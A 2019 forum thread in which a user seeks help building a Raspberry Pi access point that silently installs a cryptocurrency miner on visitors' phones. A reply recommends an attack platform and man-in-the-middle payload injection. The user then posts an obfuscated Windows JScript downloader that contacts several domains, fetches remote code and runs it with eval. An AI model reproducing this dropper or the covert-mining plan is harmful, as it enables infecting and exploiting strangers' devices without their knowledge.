Raspberry Access Point

z3r0x · May 2, 2019, 10:06pm

Hello

If some one had an idea just theoretically. Using raspberry pi 3 B+ with some Linux (raspbian) and make an Access Point for example some one connect on rpi and there is some picture with button and if some one click on that button that person gets a malware which will silently mine (XMR) on his mobile device (Android or iOS). Also no notification of something is downloading on his phone.
Just question how would you make this idea work and what malware you would use. If it’s possible for you try step by step . I know maybe it’s too much writing but it would help. Thank you

To be sure talking theoretically . This is for learning purposes

nartr · May 2, 2019, 10:39pm

I’ve actually thought about this before as well, the best framework that I have found to help with this is MaMe82’s P4wnP1. It’s a fairly advanced attack platform that will allow you to set up a wireless access point fairly easily. As far as the malware goes, I would say attempt to inject your payload into an image that is being downloaded on your network. Something like the mitmproxy could certainly help with this as you can set the parameters for each and every http request and response. Let me know how the project goes!
Links:

z3r0x · May 2, 2019, 10:50pm

For this project I might have some hardware for this … basically raspbian OS might work for this. Just need to find right malware for this. But since my programming skills are not enough for this . I would really appreciate if some on give me exactly malware I need .

z3r0x · May 3, 2019, 2:55am

Friend of mine sent me this but I am not sure if it will properly work

var x = “liveatwispresort.com palmspringsevents.net strannikspace.com yst.orlyreznik.com yosh.truecompassdesigns.net”.split(" “);
var m = “0000001MNtqj3MpxSu1PA98hjRULPNJmuhzpdGHkLRUB8RcsgNju4fJh6NMfHNi8ZIh2QU3-BjUKqGwXezJaZJ15pqMNzo1rqkRZOnF_PfFnN8Q8G6RlNwtnXA”;
var zx = ‘p’;
var ZHUL = ‘h’;
var tus = ‘S’;
for (var i=0; i<x.length; i++)
{
var e = WScript.CreateObject(“M”+tus+“XML2.XMLHTTP”);
try
{
var ih = “G”+“E”+“T”;
var mter = “:”+”";
var tjkh = x[i];
var zn = ‘/’;
var kt = ‘t’;
e.open(ih,
ZHUL+""+kt+""+kt+""+zx+mter+zn+zn+tjkh+zn+“c”+“ounter”+""+zn+""+"?"+m,

	false);
	e.send();

	var r = e.responseText;
	var zhim = 500;
	var got = 50+450+zhim;
	if (r.length > got && r.indexOf(m) > (got+1-1002))
	{
		var ikagdh = r.split(m).join("a");
		eval(ikagdh);

		break;
	};
}
catch(e)
{
};

};

system · June 1, 2019, 10:06pm

This topic was automatically closed after 30 days. New replies are no longer allowed.